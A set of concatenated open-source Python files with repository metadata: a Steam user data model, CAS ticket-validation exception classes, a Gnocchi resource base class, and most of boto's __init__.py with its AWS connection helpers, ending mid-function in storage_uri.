"copies": "1",
"ref": "refs/heads/master",
"path": "secondguard/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "19330"
}
],
"symlink_target": ""
} |
from datetime import datetime
from binascii import hexlify
from gevent.event import Event
from steam.steamid import SteamID
from steam.enums import EFriendRelationship, EPersonaState, EChatEntryType
from steam.enums.emsg import EMsg
from steam.core.msg import MsgProto
class SteamUser(object):
"""
A data model for a Steam user. Holds user persona state, and related actions
.. note::
This is an internal object that can be obtained by :meth:`SteamClient.get_user`
"""
_pstate = None
_pstate_requested = False
steam_id = SteamID() #: steam id
relationship = EFriendRelationship.NONE #: friendship status
def __init__(self, steam_id, steam):
self._pstate_ready = Event()
self._steam = steam
self.steam_id = SteamID(steam_id)
def __repr__(self):
return "<%s(%s, %s, %s)>" % (
self.__class__.__name__,
str(self.steam_id),
self.relationship,
self.state,
)
def refresh(self, wait=True):
if self._pstate_requested and self._pstate_ready.is_set():
self._pstate_requested = False
if not self._pstate_requested:
self._steam.request_persona_state([self.steam_id])
self._pstate_ready.clear()
self._pstate_requested = True
if wait:
self._pstate_ready.wait(timeout=5)
self._pstate_requested = False
def get_ps(self, field_name, wait_pstate=True):
"""Get property from PersonaState
`See full list of available fields_names <https://github.com/ValvePython/steam/blob/fa8a5127e9bb23185483930da0b6ae85e93055a7/protobufs/steammessages_clientserver_friends.proto#L125-L153>`_
"""
if not self._pstate_ready.is_set() and wait_pstate:
self.refresh()
if self._pstate is not None:
return getattr(self._pstate, field_name)
else:
return None
@property
def last_logon(self):
""":rtype: :class:`datetime`, :class:`None`"""
ts = self.get_ps('last_logon')
return datetime.utcfromtimestamp(ts) if ts else None
@property
def last_logoff(self):
""":rtype: :class:`datetime`, :class:`None`"""
ts = self.get_ps('last_logoff')
return datetime.utcfromtimestamp(ts) if ts else None
@property
def name(self):
"""Name of the steam user, or ``None`` if it's not available
:rtype: :class:`str`, :class:`None`
"""
return self.get_ps('player_name')
@property
def state(self):
"""Personsa state (e.g. Online, Offline, Away, Busy, etc)
:rtype: :class:`.EPersonaState`
"""
state = self.get_ps('persona_state', False)
return EPersonaState(state) if state else EPersonaState.Offline
@property
def rich_presence(self):
"""Contains Rich Presence key-values
:rtype: dict
"""
kvs = self.get_ps('rich_presence')
data = {}
if kvs:
for kv in kvs:
data[kv.key] = kv.value
return data
def get_avatar_url(self, size=2):
"""Get URL to avatar picture
:param size: possible values are ``0``, ``1``, or ``2`` corresponding to small, medium, large
:type size: :class:`int`
:return: url to avatar
:rtype: :class:`str`
"""
hashbytes = self.get_ps('avatar_hash')
if hashbytes != "\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000":
ahash = hexlify(hashbytes).decode('ascii')
else:
ahash = 'fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb'
sizes = {
0: '',
1: '_medium',
2: '_full',
}
url = "http://cdn.akamai.steamstatic.com/steamcommunity/public/images/avatars/%s/%s%s.jpg"
return url % (ahash[:2], ahash, sizes[size])
def send_message(self, message):
"""Send chat message to this steam user
:param message: message to send
:type message: str
"""
# new chat
if self._steam.chat_mode == 2:
self._steam.send_um("FriendMessages.SendMessage#1", {
'steamid': self.steam_id,
'message': message,
'chat_entry_type': EChatEntryType.ChatMsg,
})
# old chat
else:
self._steam.send(MsgProto(EMsg.ClientFriendMsg), {
'steamid': self.steam_id,
'chat_entry_type': EChatEntryType.ChatMsg,
'message': message.encode('utf8'),
})
def block(self):
"""Block user"""
self._steam.friends.block(self)
def unblock(self):
"""Unblock user"""
self._steam.friends.unblock(self)
| {
"content_hash": "a2ffd4cd3a6c5c5f9a7c659d8bfc1418",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 196,
"avg_line_length": 31.212903225806453,
"alnum_prop": 0.5725506407606449,
"repo_name": "ValvePython/steam",
"id": "1eebeeac3cd1209257ba440f776ecc39678ba0cb",
"size": "4838",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "steam/client/user.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2566"
},
{
"name": "Python",
"bytes": "470889"
}
],
"symlink_target": ""
} |
"""
(2.5.3, 2.7.3) Exceptions for ticket validation failure responses
with the set of error codes that all CAS servers must implement.
"""
class ValidationError(Exception):
"""Base exception class for ticket validation failures."""
class InvalidRequest(ValidationError):
"""Not all of the required request parameters were present."""
code = 'INVALID_REQUEST'
class InvalidTicketSpec(ValidationError):
"""Failure to meet the requirements of validation specification."""
code = 'INVALID_TICKET_SPEC'
class UnauthorizedServiceProxy(ValidationError):
"""The service is not authorized to perform proxy authentication."""
code = 'UNAUTHORIZED_SERVICE_PROXY'
class InvalidProxyCallback(ValidationError):
"""The proxy callback specified is invalid."""
code = 'INVALID_PROXY_CALLBACK'
class InvalidTicket(ValidationError):
"""
The ticket provided was not valid, or the ticket did not come
from an initial login and renew was set on validation.
"""
code = 'INVALID_TICKET'
class InvalidService(ValidationError):
"""
The service specified did not match the service identifier
associated with the ticket.
"""
code = 'INVALID_SERVICE'
class InternalError(ValidationError):
"""An internal error occurred during ticket validation."""
code = 'INTERNAL_ERROR'
class UnauthorizedService(ValidationError):
"""Service is unauthorized to perform the proxy request."""
code = 'UNAUTHORIZED_SERVICE'
| {
"content_hash": "c43da06e59c68ea48e91ec786927e28d",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 72,
"avg_line_length": 27.537037037037038,
"alnum_prop": 0.7262945527908541,
"repo_name": "orbitvu/django-mama-cas",
"id": "dd1c707820a2d7671a398736f211bdc446f061dc",
"size": "1487",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mama_cas/exceptions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "3971"
},
{
"name": "Python",
"bytes": "164680"
}
],
"symlink_target": ""
} |
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class ResourceBase(object):
"""Base class for resource."""
@abc.abstractmethod
def get_resource_extra_attributes(self, sample):
"""Extract the metadata from a ceilometer sample.
:param sample: The ceilometer sample
:returns: the resource attributes
"""
@abc.abstractmethod
def get_metrics_names(self):
"""Return the metric handled by this resource.
:returns: list of metric names
"""
| {
"content_hash": "51b9977db2d88497f144c036f8a36b58",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 57,
"avg_line_length": 22.652173913043477,
"alnum_prop": 0.6487523992322457,
"repo_name": "idegtiarov/gnocchi-rep",
"id": "37d1ed70d82235f7c1a49ddea68852e9fd2fb9d0",
"size": "1155",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "gnocchi/ceilometer/resources/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "706"
},
{
"name": "Mako",
"bytes": "1124"
},
{
"name": "Python",
"bytes": "445026"
},
{
"name": "Shell",
"bytes": "19534"
}
],
"symlink_target": ""
} |
from boto.pyami.config import Config, BotoConfigLocations
from boto.storage_uri import BucketStorageUri, FileStorageUri
import boto.plugin
import datetime
import os
import platform
import re
import sys
import logging
import logging.config
import urlparse
from boto.exception import InvalidUriError
__version__ = '2.25.0'
Version = __version__ # for backware compatibility
# http://bugs.python.org/issue7980
datetime.datetime.strptime('', '')
UserAgent = 'Boto/%s Python/%s %s/%s' % (
__version__,
platform.python_version(),
platform.system(),
platform.release()
)
config = Config()
# Regex to disallow buckets violating charset or not [3..255] chars total.
BUCKET_NAME_RE = re.compile(r'^[a-zA-Z0-9][a-zA-Z0-9\._-]{1,253}[a-zA-Z0-9]$')
# Regex to disallow buckets with individual DNS labels longer than 63.
TOO_LONG_DNS_NAME_COMP = re.compile(r'[-_a-z0-9]{64}')
GENERATION_RE = re.compile(r'(?P<versionless_uri_str>.+)'
r'#(?P<generation>[0-9]+)$')
VERSION_RE = re.compile('(?P<versionless_uri_str>.+)#(?P<version_id>.+)$')
ENDPOINTS_PATH = os.path.join(os.path.dirname(__file__), 'endpoints.json')
def init_logging():
for file in BotoConfigLocations:
try:
logging.config.fileConfig(os.path.expanduser(file))
except:
pass
class NullHandler(logging.Handler):
def emit(self, record):
pass
log = logging.getLogger('boto')
perflog = logging.getLogger('boto.perf')
log.addHandler(NullHandler())
perflog.addHandler(NullHandler())
init_logging()
# convenience function to set logging to a particular file
def set_file_logger(name, filepath, level=logging.INFO, format_string=None):
global log
if not format_string:
format_string = "%(asctime)s %(name)s [%(levelname)s]:%(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
fh = logging.FileHandler(filepath)
fh.setLevel(level)
formatter = logging.Formatter(format_string)
fh.setFormatter(formatter)
logger.addHandler(fh)
log = logger
def set_stream_logger(name, level=logging.DEBUG, format_string=None):
global log
if not format_string:
format_string = "%(asctime)s %(name)s [%(levelname)s]:%(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
fh = logging.StreamHandler()
fh.setLevel(level)
formatter = logging.Formatter(format_string)
fh.setFormatter(formatter)
logger.addHandler(fh)
log = logger
def connect_sqs(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sqs.connection.SQSConnection`
:return: A connection to Amazon's SQS
"""
from boto.sqs.connection import SQSConnection
return SQSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_s3(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.s3.connection.S3Connection`
:return: A connection to Amazon's S3
"""
from boto.s3.connection import S3Connection
return S3Connection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_gs(gs_access_key_id=None, gs_secret_access_key=None, **kwargs):
"""
@type gs_access_key_id: string
@param gs_access_key_id: Your Google Cloud Storage Access Key ID
@type gs_secret_access_key: string
@param gs_secret_access_key: Your Google Cloud Storage Secret Access Key
@rtype: L{GSConnection<boto.gs.connection.GSConnection>}
@return: A connection to Google's Storage service
"""
from boto.gs.connection import GSConnection
return GSConnection(gs_access_key_id, gs_secret_access_key, **kwargs)
def connect_ec2(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.connection.EC2Connection`
:return: A connection to Amazon's EC2
"""
from boto.ec2.connection import EC2Connection
return EC2Connection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_elb(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.elb.ELBConnection`
:return: A connection to Amazon's Load Balancing Service
"""
from boto.ec2.elb import ELBConnection
return ELBConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_autoscale(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.autoscale.AutoScaleConnection`
:return: A connection to Amazon's Auto Scaling Service
"""
from boto.ec2.autoscale import AutoScaleConnection
return AutoScaleConnection(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_cloudwatch(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.cloudwatch.CloudWatchConnection`
:return: A connection to Amazon's EC2 Monitoring service
"""
from boto.ec2.cloudwatch import CloudWatchConnection
return CloudWatchConnection(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_sdb(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sdb.connection.SDBConnection`
:return: A connection to Amazon's SDB
"""
from boto.sdb.connection import SDBConnection
return SDBConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_fps(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.fps.connection.FPSConnection`
:return: A connection to FPS
"""
from boto.fps.connection import FPSConnection
return FPSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_mturk(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.mturk.connection.MTurkConnection`
:return: A connection to MTurk
"""
from boto.mturk.connection import MTurkConnection
return MTurkConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_cloudfront(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.fps.connection.FPSConnection`
:return: A connection to FPS
"""
from boto.cloudfront import CloudFrontConnection
return CloudFrontConnection(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_vpc(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.vpc.VPCConnection`
:return: A connection to VPC
"""
from boto.vpc import VPCConnection
return VPCConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_rds(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.rds.RDSConnection`
:return: A connection to RDS
"""
from boto.rds import RDSConnection
return RDSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_rds2(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.rds2.layer1.RDSConnection`
:return: A connection to RDS
"""
from boto.rds2.layer1 import RDSConnection
return RDSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_emr(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.emr.EmrConnection`
:return: A connection to Elastic mapreduce
"""
from boto.emr import EmrConnection
return EmrConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_sns(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sns.SNSConnection`
:return: A connection to Amazon's SNS
"""
from boto.sns import SNSConnection
return SNSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_iam(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.iam.IAMConnection`
:return: A connection to Amazon's IAM
"""
from boto.iam import IAMConnection
return IAMConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_route53(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.dns.Route53Connection`
:return: A connection to Amazon's Route53 DNS Service
"""
from boto.route53 import Route53Connection
return Route53Connection(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_cloudformation(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.cloudformation.CloudFormationConnection`
:return: A connection to Amazon's CloudFormation Service
"""
from boto.cloudformation import CloudFormationConnection
return CloudFormationConnection(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_euca(host=None, aws_access_key_id=None, aws_secret_access_key=None,
port=8773, path='/services/Eucalyptus', is_secure=False,
**kwargs):
"""
Connect to a Eucalyptus service.
:type host: string
:param host: the host name or ip address of the Eucalyptus server
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.connection.EC2Connection`
:return: A connection to Eucalyptus server
"""
from boto.ec2 import EC2Connection
from boto.ec2.regioninfo import RegionInfo
# Check for values in boto config, if not supplied as args
if not aws_access_key_id:
aws_access_key_id = config.get('Credentials',
'euca_access_key_id',
None)
if not aws_secret_access_key:
aws_secret_access_key = config.get('Credentials',
'euca_secret_access_key',
None)
if not host:
host = config.get('Boto', 'eucalyptus_host', None)
reg = RegionInfo(name='eucalyptus', endpoint=host)
return EC2Connection(aws_access_key_id, aws_secret_access_key,
region=reg, port=port, path=path,
is_secure=is_secure, **kwargs)
def connect_glacier(aws_access_key_id=None, aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.glacier.layer2.Layer2`
:return: A connection to Amazon's Glacier Service
"""
from boto.glacier.layer2 import Layer2
return Layer2(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_ec2_endpoint(url, aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
Connect to an EC2 Api endpoint. Additional arguments are passed
through to connect_ec2.
:type url: string
:param url: A url for the ec2 api endpoint to connect to
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.connection.EC2Connection`
:return: A connection to Eucalyptus server
"""
from boto.ec2.regioninfo import RegionInfo
purl = urlparse.urlparse(url)
kwargs['port'] = purl.port
kwargs['host'] = purl.hostname
kwargs['path'] = purl.path
if not 'is_secure' in kwargs:
kwargs['is_secure'] = (purl.scheme == "https")
kwargs['region'] = RegionInfo(name=purl.hostname,
endpoint=purl.hostname)
kwargs['aws_access_key_id'] = aws_access_key_id
kwargs['aws_secret_access_key'] = aws_secret_access_key
return(connect_ec2(**kwargs))
def connect_walrus(host=None, aws_access_key_id=None,
aws_secret_access_key=None,
port=8773, path='/services/Walrus', is_secure=False,
**kwargs):
"""
Connect to a Walrus service.
:type host: string
:param host: the host name or ip address of the Walrus server
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.s3.connection.S3Connection`
:return: A connection to Walrus
"""
from boto.s3.connection import S3Connection
from boto.s3.connection import OrdinaryCallingFormat
# Check for values in boto config, if not supplied as args
if not aws_access_key_id:
aws_access_key_id = config.get('Credentials',
'euca_access_key_id',
None)
if not aws_secret_access_key:
aws_secret_access_key = config.get('Credentials',
'euca_secret_access_key',
None)
if not host:
host = config.get('Boto', 'walrus_host', None)
return S3Connection(aws_access_key_id, aws_secret_access_key,
host=host, port=port, path=path,
calling_format=OrdinaryCallingFormat(),
is_secure=is_secure, **kwargs)
def connect_ses(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ses.SESConnection`
:return: A connection to Amazon's SES
"""
from boto.ses import SESConnection
return SESConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_sts(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sts.STSConnection`
:return: A connection to Amazon's STS
"""
from boto.sts import STSConnection
return STSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_ia(ia_access_key_id=None, ia_secret_access_key=None,
is_secure=False, **kwargs):
"""
Connect to the Internet Archive via their S3-like API.
:type ia_access_key_id: string
:param ia_access_key_id: Your IA Access Key ID. This will also look
in your boto config file for an entry in the Credentials
section called "ia_access_key_id"
:type ia_secret_access_key: string
:param ia_secret_access_key: Your IA Secret Access Key. This will also
look in your boto config file for an entry in the Credentials
section called "ia_secret_access_key"
:rtype: :class:`boto.s3.connection.S3Connection`
:return: A connection to the Internet Archive
"""
from boto.s3.connection import S3Connection
from boto.s3.connection import OrdinaryCallingFormat
access_key = config.get('Credentials', 'ia_access_key_id',
ia_access_key_id)
secret_key = config.get('Credentials', 'ia_secret_access_key',
ia_secret_access_key)
return S3Connection(access_key, secret_key,
host='s3.us.archive.org',
calling_format=OrdinaryCallingFormat(),
is_secure=is_secure, **kwargs)
def connect_dynamodb(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.dynamodb.layer2.Layer2`
:return: A connection to the Layer2 interface for DynamoDB.
"""
from boto.dynamodb.layer2 import Layer2
return Layer2(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_swf(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.swf.layer1.Layer1`
:return: A connection to the Layer1 interface for SWF.
"""
from boto.swf.layer1 import Layer1
return Layer1(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_cloudsearch(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.autoscale.CloudSearchConnection`
:return: A connection to Amazon's CloudSearch service
"""
from boto.cloudsearch.layer2 import Layer2
return Layer2(aws_access_key_id, aws_secret_access_key,
**kwargs)
def connect_beanstalk(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.beanstalk.layer1.Layer1`
:return: A connection to Amazon's Elastic Beanstalk service
"""
from boto.beanstalk.layer1 import Layer1
return Layer1(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_elastictranscoder(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ets.layer1.ElasticTranscoderConnection`
:return: A connection to Amazon's Elastic Transcoder service
"""
from boto.elastictranscoder.layer1 import ElasticTranscoderConnection
return ElasticTranscoderConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs)
def connect_opsworks(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
from boto.opsworks.layer1 import OpsWorksConnection
return OpsWorksConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs)
def connect_redshift(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.redshift.layer1.RedshiftConnection`
:return: A connection to Amazon's Redshift service
"""
from boto.redshift.layer1 import RedshiftConnection
return RedshiftConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs
)
def connect_support(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.support.layer1.SupportConnection`
:return: A connection to Amazon's Support service
"""
from boto.support.layer1 import SupportConnection
return SupportConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs
)
def connect_cloudtrail(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
Connect to AWS CloudTrail
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.cloudtrail.layer1.CloudtrailConnection`
:return: A connection to the AWS Cloudtrail service
"""
from boto.cloudtrail.layer1 import CloudTrailConnection
return CloudTrailConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs
)
def connect_directconnect(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
Connect to AWS DirectConnect
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.directconnect.layer1.DirectConnectConnection`
:return: A connection to the AWS DirectConnect service
"""
from boto.directconnect.layer1 import DirectConnectConnection
return DirectConnectConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs
)
def connect_kinesis(aws_access_key_id=None,
aws_secret_access_key=None,
**kwargs):
"""
Connect to Amazon Kinesis
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
rtype: :class:`boto.kinesis.layer1.KinesisConnection`
:return: A connection to the Amazon Kinesis service
"""
from boto.kinesis.layer1 import KinesisConnection
return KinesisConnection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
**kwargs
)
def storage_uri(uri_str, default_scheme='file', debug=0, validate=True,
bucket_storage_uri_class=BucketStorageUri,
suppress_consec_slashes=True, is_latest=False):
"""
Instantiate a StorageUri from a URI string.
:type uri_str: string
:param uri_str: URI naming bucket + optional object.
:type default_scheme: string
:param default_scheme: default scheme for scheme-less URIs.
:type debug: int
:param debug: debug level to pass in to boto connection (range 0..2).
:type validate: bool
:param validate: whether to check for bucket name validity.
:type bucket_storage_uri_class: BucketStorageUri interface.
:param bucket_storage_uri_class: Allows mocking for unit tests.
:param suppress_consec_slashes: If provided, controls whether
consecutive slashes will be suppressed in key paths.
:type is_latest: bool
:param is_latest: whether this versioned object represents the
current version.
We allow validate to be disabled to allow caller
to implement bucket-level wildcarding (outside the boto library;
see gsutil).
:rtype: :class:`boto.StorageUri` subclass
:return: StorageUri subclass for given URI.
``uri_str`` must be one of the following formats:
* gs://bucket/name
* gs://bucket/name#ver
* s3://bucket/name
* gs://bucket
* s3://bucket
* filename (which could be a Unix path like /a/b/c or a Windows path like
C:\a\b\c)
The last example uses the default scheme ('file', unless overridden).
"""
version_id = None
generation = None
# Manually parse URI components instead of using urlparse.urlparse because
# what we're calling URIs don't really fit the standard syntax for URIs
# (the latter includes an optional host/net location part).
end_scheme_idx = uri_str.find('://')
if end_scheme_idx == -1:
scheme = default_scheme.lower()
path = uri_str
else:
scheme = uri_str[0:end_scheme_idx].lower()
path = uri_str[end_scheme_idx + 3:]
if scheme not in ['file', 's3', 'gs']:
raise InvalidUriError('Unrecognized scheme "%s"' % scheme)
if scheme == 'file':
# For file URIs we have no bucket name, and use the complete path
# (minus 'file://') as the object name.
is_stream = False
if path == '-':
is_stream = True
return FileStorageUri(path, debug, is_stream)
else:
path_parts = path.split('/', 1)
bucket_name = path_parts[0]
object_name = ''
# If validate enabled, ensure the bucket name is valid, to avoid
# possibly confusing other parts of the code. (For example if we didn't
# catch bucket names containing ':', when a user tried to connect to
# the server with that name they might get a confusing error about
# non-integer port numbers.)
if (validate and bucket_name and
(not BUCKET_NAME_RE.match(bucket_name)
or TOO_LONG_DNS_NAME_COMP.search(bucket_name))):
raise InvalidUriError('Invalid bucket name in URI "%s"' % uri_str)
if scheme == 'gs':
match = GENERATION_RE.search(path)
if match:
md = match.groupdict()
versionless_uri_str = md['versionless_uri_str']
path_parts = versionless_uri_str.split('/', 1)
generation = int(md['generation'])
elif scheme == 's3':
match = VERSION_RE.search(path)
if match:
md = match.groupdict()
versionless_uri_str = md['versionless_uri_str']
path_parts = versionless_uri_str.split('/', 1)
